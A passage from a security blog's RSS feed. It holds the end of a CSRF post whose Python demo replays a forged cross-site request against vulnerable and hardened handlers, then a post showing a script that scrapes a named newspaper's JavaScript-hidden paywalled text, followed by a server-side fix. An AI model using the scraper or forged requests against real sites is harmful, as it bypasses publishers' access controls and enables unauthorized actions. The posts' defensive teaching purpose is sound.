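        return "rejected: state change must be a POST"
    if not origin_allowed(request["headers"], site_host):
        return "rejected: cross-site origin"
    if not csrf_token_valid(session, request["params"].get("csrf_token")):
        return "rejected: bad csrf token"
    number = request["params"].get("transaction_number")
    if number is None:
        return "no transaction"
    session["transactions"] = "Transaction Made=" + number
    return session["transactions"]


def demo():
    """Replay the post's attack (img-tag GET from the attacker's page) against
    both handlers, then a legitimate submission from the site's own form."""
    session = {"logedin": True}
    forged = {"method": "GET",
              "params": {"transaction_number": "1337"},
              "headers": {"Referer": ATTACKER},
              "session": session}
    # the vulnerable handler gets its own copy of the session so the second
    # run starts from a clean state
    before = vulnerable_transaction(dict(forged, session=dict(session)))
    after = hardened_transaction(forged)
    token = issue_csrf_token(session)
    legit = {"method": "POST",
             "params": {"transaction_number": "42", "csrf_token": token},
             "headers": {"Origin": "http://" + SITE_HOST},
             "session": session}
    return before, after, hardened_transaction(legit)


if __name__ == "__main__":
    print(demo())
```

&lt;p&gt;The three checks are deliberately independent: the POST rule defeats the img tag, the Origin check defeats an auto-submitted form from another site, and the token defeats both even when the browser sends no Origin or Referer at all.&lt;/p&gt;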

&lt;p&gt;References: &lt;a href=&quot;https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)&quot;&gt;OWASP CSRF &lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Happy New Year for everyone!&lt;/p&gt;

</description>
        <pubDate>Mon, 11 Dec 2017 23:00:00 +0000</pubDate>
        <link>http://www.0x90.zone/websecurity/2017/12/11/CSRFandCOORS.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/websecurity/2017/12/11/CSRFandCOORS.html</guid>
        
        
        <category>WebSecurity</category>
        
      </item>
    
      <item>
        <title>How to not implement Security - A tale of Hidden Text</title>
        <description>&lt;p&gt;Finally, with some time to write. This time I want to point out a very common mistake in web application programming, which is hiding content with JavaScript. Time and time again I see this “mistake” on university sites, shopping sites and online newspapers.&lt;/p&gt;

&lt;p&gt;Recently I was browsing a news site and suddenly I couldn’t load the whole story, since I was using an ad-blocker and hadn’t paid for a subscription (obviously), although it was a very interesting story and I really wanted to read it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/publicoStory/limitedeArtigos.png&quot; alt=&quot;Reaching Limit of Articles&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And after the limit is reached we are presented with this:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/publicoStory/limiteReached.png&quot; alt=&quot;Limit Reached&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The very first thing I saw was a subtle fade-out of the story text, and I started wondering where the hell the text went. Of course, being me, the very next thing was to look at the source code and, surprise surprise, there was the rest of the story. Not in a very friendly view, but I could finish reading it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/publicoStory/sourceLimiteReached.png&quot; alt=&quot;Source Code of the Article&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I then checked other stories and the same thing happened: the story is loaded, but hidden. Python to the rescue then! I created a little script that receives the URL of the story and strips everything else to present the raw text of the story. I could obviously build a document with all the images and such but, normally, the images appear in the header of the page and are not hidden (some exceptions apply).&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;urllib2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;re&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sys&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;bs4&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;BeautifulSoup&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;#This script will show, in a more user-friendly way, the hidden news in the publico.pt website
&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;#Check for news link
&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;argv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;No News Portal was passed&quot;&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;#Execute the request
&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;req&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;urllib2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;argv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;response&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;urllib2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;urlopen&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;req&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;noticia&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;response&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;#Parse the data to be more user-friendly
&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;soup&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;BeautifulSoup&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;noticia&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;html.parser&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;story&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;soup&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;find&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;story-body&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;entry&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;story&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;find_all&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;p&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;prep&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;entry&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;stripExtra&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;re&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sub&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;sa&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&amp;lt;[a-zA-Z/]*&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;sa&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;prep&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;stripExtra&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/publicoStory/pythonInAction.png&quot; alt=&quot;Article from the Script&quot; /&gt;&lt;/p&gt;

&lt;p&gt;To summarize: if you are building a web portal, check permissions on the server first and don’t just hide information on the client. A simple mitigation for this issue is that, when the reader clicks the button to read the whole story, an AJAX request is made to the server, which checks the login information and only then returns the rest of the text; this also makes the change less abrupt in the application.
Also, this is just an example of what could happen. I don’t endorse this method, and if you really want to read the news on this or another paid website, you should contribute to that newspaper so they can keep doing their good job.&lt;/p&gt;
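&lt;p&gt;An added example, neither the post’s script nor the newspaper’s code, contrasting the two designs from the paragraph above in Python. The article, the two-paragraph free teaser, the session dict and the hidden flag that stands in for the CSS fade-out are all assumptions made for the example; scrape() does what the script above effectively does, which is to read every paragraph that reached the client regardless of how it is styled.&lt;/p&gt;

```python
# Constructed article (not from any real site): the first FREE_PARAGRAPHS
# paragraphs are the teaser everyone may read, the rest is paywalled.
ARTICLE = {
    "id": "story-1",
    "paragraphs": [
        "Paragraph one, part of the free teaser.",
        "Paragraph two, part of the free teaser.",
        "Paragraph three, subscribers only.",
        "Paragraph four, subscribers only.",
    ],
}
FREE_PARAGRAPHS = 2


def render_hidden_with_js(article, session):
    """The pattern the post complains about: the whole story is sent and the
    client is merely told to hide the tail (the 'hidden' flag stands in for a
    CSS class or JavaScript fade-out). The session is never consulted."""
    del session
    body = article["paragraphs"]
    teaser = [{"text": p, "hidden": False} for p in body[:FREE_PARAGRAPHS]]
    tail = [{"text": p, "hidden": True} for p in body[FREE_PARAGRAPHS:]]
    return teaser + tail


def render_checked_server_side(article, session):
    """Hardened: the server decides what leaves it. The paywalled paragraphs
    are only serialised when the session proves a subscription, so there is
    nothing to hide and nothing for the source view to reveal."""
    body = article["paragraphs"]
    if session.get("subscriber"):
        allowed = body
    else:
        allowed = body[:FREE_PARAGRAPHS]
    return [{"text": p, "hidden": False} for p in allowed]


def scrape(response):
    """What the post's script effectively does: ignore presentation and read
    every paragraph that reached the client."""
    return [item["text"] for item in response]


def demo():
    """Paragraph counts a scraper recovers: (leaky design, hardened design as
    anonymous reader, hardened design as subscriber)."""
    anonymous = {}
    leaked = scrape(render_hidden_with_js(ARTICLE, anonymous))
    gated = scrape(render_checked_server_side(ARTICLE, anonymous))
    paid = scrape(render_checked_server_side(ARTICLE, {"subscriber": True}))
    return len(leaked), len(gated), len(paid)


if __name__ == "__main__":
    print(demo())
```

&lt;p&gt;The AJAX endpoint described above is render_checked_server_side called with the session recovered from the login cookie: the anonymous reader’s response simply does not contain the paywalled paragraphs, so neither the source view nor a script can recover them.&lt;/p&gt;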

</description>
        <pubDate>Sun, 09 Jul 2017 23:00:00 +0000</pubDate>
        <link>http://www.0x90.zone/javascript/2017/07/09/How-To-Not-Implement-Security.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/javascript/2017/07/09/How-To-Not-Implement-Security.html</guid>
        
        
        <category>JavaScript</category>
        
      </item>
    
  </channel>
</rss>
